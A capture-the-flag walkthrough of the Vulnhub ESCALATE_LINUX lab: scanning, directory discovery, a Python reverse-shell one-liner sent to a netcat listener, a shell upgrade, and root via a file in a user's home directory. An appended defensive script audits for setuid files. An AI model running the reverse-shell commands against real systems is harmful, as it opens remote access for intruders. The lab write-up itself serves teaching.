Vulnhub ESCALATE_LINUX Walkthrough

Running nmap to see information about the host:

nmap -A -T4 -p- 192.168.1.18 -vv

Let's run dirb on the site using -X .php to find PHP pages:

dirb http://192.168.1.18 -X .php

A page with the name shell.php is found, ummmm, ran it and I got:

And then using a Python script to connect while running nc -lvp 4444 on my machine:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And I got a shell... Breaking out of it:

python -c 'import pty; pty.spawn("/bin/bash")'

And if you get double characters, use this command:

stty raw -echo (I googled it 😀)

Going straight to home, we find we have user1 – user2 – user3 – user4 – user5 – user6 – user7 – user8.

As I went from one to the next listing files, when I reached user 3 I found a file named shell, ran it and I'm root, simple as that.
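
The root shell above came from simply running a file that sat in a user's home directory. The post does not say why that worked; assuming the file was a setuid-root executable, the following added example (not part of the original post; the names `Finding`, `classify` and `scan` are hypothetical) audits home directories for setuid/setgid executables so they can be reviewed and removed.

```python
import os
import stat
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    owner_uid: int
    setuid: bool
    setgid: bool
    root_owned: bool
    writable_by_others: bool  # group- or world-writable, so other users can replace it


def classify(path, st):
    """Return a Finding if st describes a setuid/setgid executable regular file, else None."""
    mode = st.st_mode
    if not stat.S_ISREG(mode):
        return None
    suid = bool(mode & stat.S_ISUID)
    sgid = bool(mode & stat.S_ISGID)
    executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    if not (suid or sgid) or not executable:
        return None
    return Finding(path, st.st_uid, suid, sgid, st.st_uid == 0,
                   bool(mode & (stat.S_IWGRP | stat.S_IWOTH)))


def scan(root="/home"):
    """Walk root without following symlinks; list setuid-root files first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the entry itself, not a link target
            except OSError:
                continue  # vanished or unreadable entry
            finding = classify(path, st)
            if finding:
                findings.append(finding)
    return sorted(findings, key=lambda f: (not (f.setuid and f.root_owned), f.path))


if __name__ == "__main__":
    for f in scan():
        tag = "SETUID-ROOT" if f.setuid and f.root_owned else "setuid/setgid"
        print(f"{tag:13} uid={f.owner_uid} others-writable={f.writable_by_others} {f.path}")
```

Run it as root so unreadable home directories are not silently skipped; any setuid-root hit under a home directory deserves an explanation or a `chmod u-s`.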
